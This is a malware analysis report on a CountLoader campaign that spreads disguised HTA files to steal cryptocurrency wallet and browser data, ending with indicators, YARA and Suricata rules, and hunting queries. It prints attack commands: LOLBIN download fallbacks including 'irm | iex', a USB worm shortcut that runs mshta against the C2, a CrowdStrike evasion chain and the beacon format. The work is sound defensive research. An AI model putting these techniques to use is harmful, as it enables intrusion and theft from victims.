CountLoader Unmasked: 6 Polyglot HTA Files, 76 Crypto Wallets Targeted, and a Bulletproof C2 Network Hiding Behind 6 Cloudflare Accounts
TL;DR: A coordinated CountLoader campaign uploaded to MalwareBazaar on 2026-03-09 uses HTML Application (HTA) files disguised with benign extensions (.wav, .xml, .mp4, .ini, .csv) to bypass email security filters. Once executed, XOR-obfuscated JavaScript targets 76 cryptocurrency wallet browser extensions and 6 desktop hardware wallet applications -- the most comprehensive crypto wallet targeting list we have observed in a single campaign. All 5 C2 domains are registered through the same Hong Kong registrar (NiceNIC), resolve to a single AlexHost bulletproof hosting IP in Moldova (194.102.104.221), and are compartmentalized across 6 separate Cloudflare accounts. A Russian-language error string, USB worm capability, and CrowdStrike Falcon-specific evasion logic round out a campaign that is operationally mature but riddled with OPSEC failures.
The Lure: Files That Aren't What They Seem
The campaign begins with six samples, each a ~122-125 KB HTML Application file wearing a disguise. None of them use the .hta extension. Instead, the operator chose extensions that email gateways routinely allow through without inspection:
| SHA256 | Filename | Extension | Size |
|---|---|---|---|
e867b6ea... | Travel_X_Config_917 | .wav | 124,578 |
4c44bd2c... | Photos_Daily_v3.0 | .xml | 124,394 |
4b044b4e... | Meeting_Photos_Temp_6194 | .mp4 | 123,596 |
084dbd55... | Europe_Dataset_Final_334 | .ini | 122,957 |
31ee0d6b... | Sales_Core_Data_518 | .csv | 121,363 |
b959663a... | Omega_Data_NewYork_2087 | .xml | 125,104 |
The filenames follow a deliberate business-professional theme: travel configurations, meeting photos, sales data, European datasets. This is not random. The operator is targeting corporate users -- people who receive these kinds of attachments daily and double-click without thinking. On Windows, if the HTA handler is registered, the file opens via mshta.exe regardless of the extension. The user sees a window flicker and disappear. The infection is already underway.
The Obfuscation Stack: Four Layers Deep
Every sample is functionally identical, but no two look alike. The operator applied four distinct obfuscation layers to frustrate signature-based detection and manual analysis.
Layer 1: Extension Spoofing
The most basic and most effective layer. Email security solutions that filter by extension will pass .wav, .xml, .mp4, .ini, and .csv files without content inspection. The actual HTML content inside triggers mshta.exe on execution.
Layer 2: XOR Numeric Cipher
All strings -- C2 URLs, API endpoints, wallet extension IDs, browser paths -- are stored as integer arrays. A per-sample XOR key decodes each integer to its character code:
var key = 576;
var setModule = [[624, 625, 626, ...], ...];
// Decoder loop:
result += String.fromCharCode(value ^ key);
Each sample uses a unique key (range: 205 to 762), meaning static signatures for decoded strings will not match across the cluster.
Layer 3: Control Flow Flattening
All function bodies are wrapped in a switch/case dispatcher with randomized case ordering:
var _order = [0, 1, 2];
var _dispatcher = 0;
while (true) {
switch (_order[_dispatcher++]) {
case 2: /* step 3 */ continue;
case 0: /* step 1 */ continue;
case 1: /* step 2 */ continue;
}
break;
}
This defeats linear code analysis and makes decompiler output nearly unreadable without reconstructing the execution order.
Layer 4: Variable Polymorphism
Function names, variable names, and array names are randomized per sample. The main decoder function appears as _runSettings in one sample, _parsePayload in another, _fetchItem in a third. Internally, every variable name differs. The functionality is byte-for-byte identical once decoded -- but automated clustering tools that rely on string matching will treat them as unrelated.
Attack Chain: From Double-Click to Crypto Drain
[Email/Web Delivery]
|
v
[Spoofed Extension File] (.wav/.xml/.mp4/.ini/.csv)
| User double-clicks -> Windows executes via mshta.exe
v
[HTA Execution]
|-- Window moved off-screen (moveTo -10000, -10000)
|-- Sandbox detection: checks for "AZURE-PC" / "Bruno" hostnames
|-- EDR detection: checks for CrowdStrike Falcon (csfalconservice)
|-- System fingerprint via WMI (OS, CPU, disks, AV, domain)
|-- Hardware ID: MD5(ProcessorId + UUID + DiskSerial)
|
v
[C2 Registration] POST /connect?hwid=...&os=...&av=...&wallets=...&exts=...
| Version string: 4.1.1 | Bearer JWT auth for subsequent calls
v
[Task Retrieval] GET /getUpdates
|
v
[Task Execution] -- 11 task types available
|-- Type 1: Download & execute via ADODB.Stream
|-- Type 2: Download & execute via rundll32
|-- Type 3: Download & execute via msiexec (silent install)
|-- Type 4: Self-delete (cleanup)
|-- Type 5: Collect & exfiltrate browser data
|-- Type 6: Download via certutil/curl/bitsadmin (LOLBIN chain)
|-- Type 9: USB spreading (LNK worm)
|-- Type 10: Execute arbitrary HTA via mshta.exe
|-- Type 11: Execute PowerShell (irm | iex)
|
v
[Persistence]
|-- Scheduled Task: "NVIDIA App SelfUpdate_{hash}"
|-- Interval: every 30 minutes
|-- Duration: 760 days (~2 years)
|-- Runs as SYSTEM when privileges allow
The Anti-Analysis Gate
Before any C2 communication occurs, the HTA performs two critical checks:
- Sandbox detection -- if the hostname is
AZURE-PCorBruno(common in automated analysis sandboxes), execution stops silently - EDR detection -- the malware enumerates running processes via
Win32_Processand specifically searches forcsfalconservice(CrowdStrike Falcon). When detected, it wraps subsequent execution incmd.exe /c start "" /b mshta.exe-- a process chain that avoids triggering Falcon's directmshta.exechild process detection rules
This is not generic anti-AV logic. The operator has specifically tested against CrowdStrike and developed a targeted bypass.
Five Download Fallbacks
The task execution engine implements five distinct download methods, tried in sequence until one succeeds:
1. VBScript MSXML2.XMLHTTP + ADODB.Stream (primary)
2. certutil.exe -urlcache -split -f (LOLBIN)
3. curl.exe -k -o (native Windows)
4. bitsadmin.exe /transfer (LOLBIN)
5. powershell.exe -ep Bypass -nop "irm | iex" (PowerShell)
This level of redundancy ensures payload delivery even when specific LOLBINs are blocked by application control policies or monitored by EDR rules.
Persistence: Impersonating NVIDIA
CountLoader creates a Windows Scheduled Task named NVIDIA App SelfUpdate_{MD5_hash} with CLSID {0830A3F8-70B8-40E1-A0F3-E0EC9092F861}. The task runs every 30 minutes with a 1-minute startup delay, and the duration is set to 760 days -- over two years. On systems where the malware has SYSTEM privileges, the task runs under the SYSTEM account. The NVIDIA naming convention is deliberate: legitimate NVIDIA software uses similar self-update task names, and administrators scanning scheduled tasks will likely skip it.
It also modifies a registry key to prevent Internet Explorer's script execution limit from killing the HTA:
HKCU\Software\Microsoft\Internet Explorer\Styles\MaxScriptStatements = 10000000 (DWORD)
The Crown Jewel: 76 Wallet Extensions
This campaign targets the most comprehensive list of cryptocurrency wallet browser extensions we have observed in a single loader. The full list spans 76 extension IDs covering every major blockchain ecosystem:
| Wallet | Extension ID | Blockchain |
|---|---|---|
| MetaMask | nkbihfbeogaeaoehlefnkodbefgpgknn | Ethereum/EVM |
| Phantom | bfnaelmomeimhlpmgjnjophhpkkoljpa | Solana |
| Rabby Wallet | acmacodkjbdgmoleebolmdjonilkdbch | Ethereum/EVM |
| Coinbase Wallet | hnfanknocfeofbddgcijnmhnfnkdnaad | Multi-chain |
| Keplr | dmkamcknogkgcdfhhbddcghachkejeap | Cosmos |
| TronLink | ibnejdfjmmkpcnlpebklmnkoeoihofec | Tron |
| Trust Wallet | aflkmfhebedbjioipglgcbcmnbpgliof | Multi-chain |
| OKX Wallet | mcohilncbfahbmgdjkbpemcciiolgcge | Multi-chain |
| Core | fcfcfllfndlomdhbehjjcoimbgofdncg | Avalanche |
| UniSat | khpkpbbcccdmmclmpigdgddabeilkdpd | Bitcoin/Ordinals |
| Tonkeeper | ldcoohedfbjoobcadoglnnmmfbdlmmhf | TON |
| Eternl | efbglgofoippbgcjepnhiblaibcnclgk | Cardano |
| Argent X | dlcobpjiigpikoobohmabehhmhfoodbb | StarkNet |
| Sui Wallet | jnlgamecbpmbajjfhmmmlhejkemejdma | Sui |
Plus 62 more, including Solflare, Leap, Temple, XDEFI, SafePal, Talisman, SubWallet, Math Wallet, NAMI, Blade, Casper, and 36 unidentified extension IDs that likely correspond to newer or regional wallet projects.
The campaign also targets 6 desktop hardware wallet applications by searching well-known installation paths:
| Application | Search Path |
|---|---|
| Ledger Live | %ProgramFiles%\Ledger Live, %APPDATA%\Programs\ledger-live |
| Trezor | %APPDATA%\@trezor |
| Exodus | %APPDATA%\Exodus |
| Atomic Wallet | %APPDATA%\atomic |
| Guarda | %APPDATA%\Guarda |
| KeepKey / BitBox02 | %APPDATA%\KeepKey, %APPDATA%\BitBox02 |
Browser data theft covers 66 Chromium-based browsers, from mainstream (Chrome, Edge, Brave, Opera, Vivaldi) to regional (Yandex, QQBrowser, SogouExplorer, CocCoc, 360Browser, Naver Whale) and niche (Torch, CentBrowser, Slimjet, SRWare Iron, K-Meleon, Liebao, Amigo).
USB Worm: Spreading Through Removable Media
Task type 9 activates a USB spreading module that enumerates removable drives via WMI and searches for .exe, .docx, .pdf, and .doc files up to 2 directories deep. For each file found, the worm:
- Hides the original file with
attrib +hidden - Creates a
.lnkshortcut with the original filename - The shortcut executes:
cmd.exe /c start original.exe & start mshta [C2_URL]
The user sees what appears to be their original file. They double-click it. The original file opens normally -- and the HTA payload silently executes in the background. This is a classic technique (T1091) that remains effective in environments where USB drives are still used for file sharing.
The USB spreading code contains the string "Ошибка: " (Russian for "Error:"), the only human-language artifact in the entire codebase.
Infrastructure: One IP, Five Domains, Six Cloudflare Accounts
All roads lead to 194.102.104.221.
The Single Point of Failure
AlexHost SRL (AS200019) -- Bulletproof Hosting, Chisinau, Moldova
|
+-- 194.102.104.0/23 (CLOUDATAMD-MNT)
|
+-- 194.102.104.221 (rDNS: mail.wooryy.com)
|
+-- [Cloudflare Proxy Layer]
|
+-- s1-rarlab.com (arnold/melinda CF pair)
+-- magnusworkspace.com (gigi/harlan CF pair)
+-- web3-walletnotify.cc (alice/venkat CF pair)
+-- s3-python.cc (daisy/steven CF pair)
+-- node1-py-store.com (elliot/lisa CF pair)
+-- node2-py-store.com (kayden/liz CF pair)
Five C2 domains, all registered through NiceNIC International Group (a Hong Kong registrar favored by Russian-speaking threat actors), all resolving to a single IP at AlexHost -- a Moldovan hosting provider with a well-documented reputation as bulletproof infrastructure.
Deliberate Compartmentalization
The operator created six separate Cloudflare accounts (each with its own nameserver pair) across the six domains. This is not accidental. If one domain is reported to Cloudflare and the associated account is suspended, the remaining five continue operating. The operator treats Cloudflare accounts as disposable infrastructure.
Domain Naming Strategy
The domains follow three distinct impersonation themes:
| Theme | Domains | Mimicking |
|---|---|---|
| WinRAR | s1-rarlab[.]com | rarlab.com (WinRAR's official site) |
| Python ecosystem | node1-py-store[.]com, s3-python[.]cc | PyPI / Python package infrastructure |
| Crypto/Web3 | web3-walletnotify[.]cc | Web3 wallet notification service |
| Corporate | magnusworkspace[.]com | Generic corporate workspace tool |
The s{N}-rarlab.com and node{N}-py-store.com patterns suggest DGA-like templating -- the operator can spin up s2-rarlab.com, s3-rarlab.com, node3-py-store.com as needed.
Certificate Timing Reveals Coordination
All domains use Let's Encrypt certificates (E7/E8 issuers). Every certificate was issued or renewed on 2026-03-09 -- the same day the samples appeared on MalwareBazaar:
| Domain | First Certificate | Renewed |
|---|---|---|
s1-rarlab[.]com | 2026-02-19 | 2026-03-09 |
magnusworkspace[.]com | 2026-02-23 | 2026-03-09 |
web3-walletnotify[.]cc | 2026-02-18 | 2026-03-09 |
s3-python[.]cc | 2025-12-16 | 2026-03-09 |
node1-py-store[.]com | 2025-10-20 (est.) | 2026-03-09 |
Same-day certificate renewal across all domains confirms a single operator managing the entire cluster. This is a significant OPSEC failure -- the timing correlation alone is sufficient to link domains that would otherwise appear unrelated.
The rDNS Breadcrumb
The reverse DNS record on 194.102.104.221 points to mail.wooryy.com -- a hostname that predates the CountLoader campaign and likely belongs to a previous or concurrent operation by the same actor. This is another attribution thread that has not been publicly documented.
OPSEC Failures
Despite the operational maturity of the obfuscation and evasion techniques, the operator made several mistakes:
- Russian error string --
"Ошибка: "in the USB spreading code reveals the developer's native language - Single C2 IP -- all 5 domains resolve to one IP; takedown of
194.102.104.221kills the entire operation - Single registrar -- all domains registered through NiceNIC; an account-level takedown is feasible
- Coordinated cert renewal -- same-day Let's Encrypt renewal across all domains creates an unmistakable correlation
- Reverse DNS leak --
mail.wooryy.comon the C2 IP links to a separate operation - Hardcoded version string --
4.1.1appears in every sample's C2 registration beacon, enabling version tracking across future campaigns
Task Key Campaign Tracking
Each sample carries a unique 20-character alphanumeric task key sent during C2 registration. These keys likely map to individual distribution channels, allowing the operator to track which delivery vector (email campaign, website, USB spread) produced each infection:
KWOAIZ1XAX03P0JU1QUL -> s1-rarlab.com (Meeting_Photos_Temp_6194.mp4)
9W4E5X479DUU8QDGM79E -> magnusworkspace.com (Travel_X_Config_917.wav)
283WPHNCNVFZAS3ELWE3 -> web3-walletnotify.cc (Photos_Daily_v3.0.xml)
D4LP25W30CJUNCW31I0Y -> web3-walletnotify.cc (Sales_Core_Data_518.csv)
35TBIP4RKAOLMH0ISYO2 -> node1-py-store.com (Europe_Dataset_Final_334.ini)
94X3WTCDSM0KQ10ATQEH -> s3-python.cc (Omega_Data_NewYork_2087.xml)
Note that web3-walletnotify[.]cc has two task keys assigned to two different samples, suggesting it serves as the primary C2 domain with multiple active distribution streams.
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Implementation |
|---|---|---|---|
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 | HTML files with spoofed extensions via email |
| Execution | User Execution: Malicious File | T1204.002 | User double-clicks .wav/.xml/.mp4/.ini/.csv file |
| Execution | Signed Binary Proxy Execution: Mshta | T1218.005 | HTA execution via mshta.exe |
| Execution | Command and Scripting Interpreter: JavaScript | T1059.007 | XOR-obfuscated JS in HTA body |
| Execution | Command and Scripting Interpreter: VBScript | T1059.005 | Embedded VBScript for ADODB.Stream downloads |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | PowerShell download cradle (irm / iex) |
| Persistence | Scheduled Task/Job: Scheduled Task | T1053.005 | "NVIDIA App SelfUpdate_{hash}", 30-min interval, 760-day duration |
| Defense Evasion | Obfuscated Files or Information | T1027 | XOR cipher, control flow flattening, polymorphic variable names |
| Defense Evasion | Masquerading: Match Legitimate Name | T1036.005 | NVIDIA task name, WinRAR/Python domain impersonation |
| Defense Evasion | System Binary Proxy Execution: Certutil | T1218 | certutil.exe for payload download |
| Defense Evasion | System Binary Proxy Execution: Msiexec | T1218.007 | msiexec.exe /quiet for silent installs |
| Defense Evasion | BITS Jobs | T1197 | bitsadmin.exe for payload download |
| Defense Evasion | Indicator Removal: File Deletion | T1070.004 | Self-deletion via task type 4 |
| Discovery | System Information Discovery | T1082 | WMI enumeration: OS, CPU, disks, AV, domain |
| Discovery | Security Software Discovery | T1518.001 | AntiVirusProduct WMI query, CrowdStrike process check |
| Discovery | Process Discovery | T1057 | Win32_Process enumeration for EDR detection |
| Discovery | Peripheral Device Discovery | T1120 | USB/removable drive enumeration via WMI |
| Collection | Data from Local System | T1005 | Browser extension data, wallet application files |
| Lateral Movement | Replication Through Removable Media | T1091 | USB LNK replacement worm |
| Command and Control | Application Layer Protocol: Web | T1071.001 | HTTPS C2 with Bearer JWT authentication |
| Command and Control | Encrypted Channel | T1573.002 | HTTPS via Cloudflare proxy |
| Command and Control | Domain Generation Algorithms | T1568.002 | s{N}-rarlab.com, node{N}-py-store.com patterns |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | Wallet/browser data sent to C2 via HTTPS POST |
Indicators of Compromise
Network Indicators
C2 Domains:
s1-rarlab[.]com
magnusworkspace[.]com
web3-walletnotify[.]cc
s3-python[.]cc
node1-py-store[.]com
node2-py-store[.]com
C2 IP:
194.102.104.221
Related Hostname:
mail.wooryy[.]com
File Indicators
| SHA256 | Filename | Size |
|---|---|---|
e867b6eab9ca3475cbed6f14d3eaab2ce742b22e7390c62c1185024aca62e11f | Travel_X_Config_917.wav | 124,578 |
4c44bd2ce55eb22ff1dbe90e47282cc6cbb7c2697d6210630559448af7ebe14d | Photos_Daily_v3.0.xml | 124,394 |
4b044b4e9eec63f249e5e8fa4276948cf8002fff4d67b9c80532c7500694fd03 | Meeting_Photos_Temp_6194.mp4 | 123,596 |
084dbd5563fb9b83793957c0ee176d38b1129987eeb5f922f27606f52c0c8be4 | Europe_Dataset_Final_334.ini | 122,957 |
31ee0d6b90096506ef3d336531903cdb8688a05086dd70b2c4e580b62181ddb3 | Sales_Core_Data_518.csv | 121,363 |
b959663a61d0725bcd0213e3a66a44505f7c51d1595e4070c93778ef22c9db36 | Omega_Data_NewYork_2087.xml | 125,104 |
Behavioral Indicators
Scheduled Task:
Name: NVIDIA App SelfUpdate_{MD5_hash}
CLSID: {0830A3F8-70B8-40E1-A0F3-E0EC9092F861}
Interval: PT30M
Duration: P760D
Delay: PT1M
Registry Modification:
Key: HKCU\Software\Microsoft\Internet Explorer\Styles\MaxScriptStatements
Value: 10000000 (DWORD)
C2 Protocol:
Registration: POST /connect?hwid={md5}&os={os}&av={av}&version=4.1.1&key={task_key}&wallets={list}&exts={list}
Task poll: GET /getUpdates (Bearer JWT)
Module pull: GET /getModule?name={name}
Completion: GET /approveUpdate?id={id}
Campaign Task Keys:
KWOAIZ1XAX03P0JU1QUL
9W4E5X479DUU8QDGM79E
283WPHNCNVFZAS3ELWE3
D4LP25W30CJUNCW31I0Y
35TBIP4RKAOLMH0ISYO2
94X3WTCDSM0KQ10ATQEH
Detection Opportunities
YARA Rules
rule CountLoader_HTA_XOR_Polyglot {
meta:
description = "Detects CountLoader HTA files with XOR-obfuscated JS and spoofed extensions"
author = "Breakglass Intelligence"
date = "2026-03-09"
tlp = "TLP:CLEAR"
severity = "HIGH"
reference = "https://intel.breakglass.tech"
strings:
$hta_tag = "<HTA:APPLICATION" ascii nocase
$xor_pattern = "String.fromCharCode" ascii
$cff1 = "switch" ascii
$cff2 = "continue" ascii
$cff3 = "dispatcher" ascii nocase
$wmi1 = "Win32_Processor" ascii
$wmi2 = "Win32_ComputerSystemProduct" ascii
$wmi3 = "Win32_DiskDrive" ascii
$sandbox1 = "AZURE-PC" ascii
$sandbox2 = "Bruno" ascii
$edr = "csfalconservice" ascii nocase
condition:
filesize < 200KB and
$hta_tag and $xor_pattern and
2 of ($cff*) and
2 of ($wmi*) and
(1 of ($sandbox*) or $edr)
}
rule CountLoader_NVIDIA_Persistence {
meta:
description = "Detects CountLoader scheduled task persistence via NVIDIA impersonation"
author = "Breakglass Intelligence"
date = "2026-03-09"
tlp = "TLP:CLEAR"
severity = "MEDIUM"
strings:
$task_name = "NVIDIA App SelfUpdate_" ascii wide
$clsid = "{0830A3F8-70B8-40E1-A0F3-E0EC9092F861}" ascii wide nocase
$duration = "P760D" ascii wide
$interval = "PT30M" ascii wide
condition:
2 of them
}
rule CountLoader_USB_Worm {
meta:
description = "Detects CountLoader USB LNK spreading component"
author = "Breakglass Intelligence"
date = "2026-03-09"
tlp = "TLP:CLEAR"
severity = "HIGH"
strings:
$ru_error = { D0 9E D1 88 D0 B8 D0 B1 D0 BA D0 B0 3A 20 } // "Ошибка: " UTF-8
$lnk_cmd = "cmd.exe /c start" ascii wide
$mshta = "mshta" ascii wide
$attrib = "attrib" ascii wide
$hidden = "+hidden" ascii wide nocase
condition:
$ru_error or
(3 of ($lnk_cmd, $mshta, $attrib, $hidden))
}
Snort/Suricata Rules
# CountLoader C2 — Known domains
alert dns any any -> any any (msg:"COUNTLOADER C2 Domain Resolution"; \
dns.query; content:"rarlab.com"; \
pcre:"/s\d+-rarlab\.com/"; \
sid:2026030901; rev:1;)
alert dns any any -> any any (msg:"COUNTLOADER C2 Domain Resolution"; \
dns.query; content:"py-store.com"; \
pcre:"/node\d+-py-store\.com/"; \
sid:2026030902; rev:1;)
alert dns any any -> any any (msg:"COUNTLOADER C2 Domain Resolution"; \
dns.query; content:"web3-walletnotify.cc"; \
sid:2026030903; rev:1;)
alert dns any any -> any any (msg:"COUNTLOADER C2 Domain Resolution"; \
dns.query; content:"s3-python.cc"; \
sid:2026030904; rev:1;)
alert dns any any -> any any (msg:"COUNTLOADER C2 Domain Resolution"; \
dns.query; content:"magnusworkspace.com"; \
sid:2026030905; rev:1;)
# CountLoader C2 — Registration beacon pattern
alert http any any -> any any (msg:"COUNTLOADER C2 Registration Beacon"; \
content:"/connect?"; http_uri; content:"hwid="; http_uri; \
content:"version=4.1.1"; http_uri; content:"wallets="; http_uri; \
sid:2026030906; rev:1;)
# CountLoader — mshta.exe spawned from cmd.exe (EDR bypass pattern)
alert any any any -> any any (msg:"COUNTLOADER CrowdStrike Bypass - cmd mshta chain"; \
content:"cmd.exe"; content:"/c start"; content:"/b mshta.exe"; \
sid:2026030907; rev:1;)
Hunting Queries
Scheduled Task Hunt (PowerShell):
Get-ScheduledTask | Where-Object { $_.TaskName -like "NVIDIA App SelfUpdate_*" } |
Select-Object TaskName, TaskPath, State, @{N='Actions';E={$_.Actions.Execute}}
Registry Hunt:
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Internet Explorer\Styles" -Name MaxScriptStatements -ErrorAction SilentlyContinue
Process Hunt -- mshta.exe with suspicious parent:
parent_process_name:cmd.exe AND process_name:mshta.exe AND
process_command_line:("/c start" AND "/b mshta.exe")
Network Hunt -- C2 registration beacon:
url.path:"/connect" AND url.query:("hwid=" AND "version=4.1.1" AND "wallets=")
Published by Breakglass Intelligence. Investigation conducted 2026-03-09. 6 MalwareBazaar samples analyzed. 5 C2 domains mapped. 76 wallet extensions extracted. All infrastructure live at time of publication. Classification: TLP:CLEAR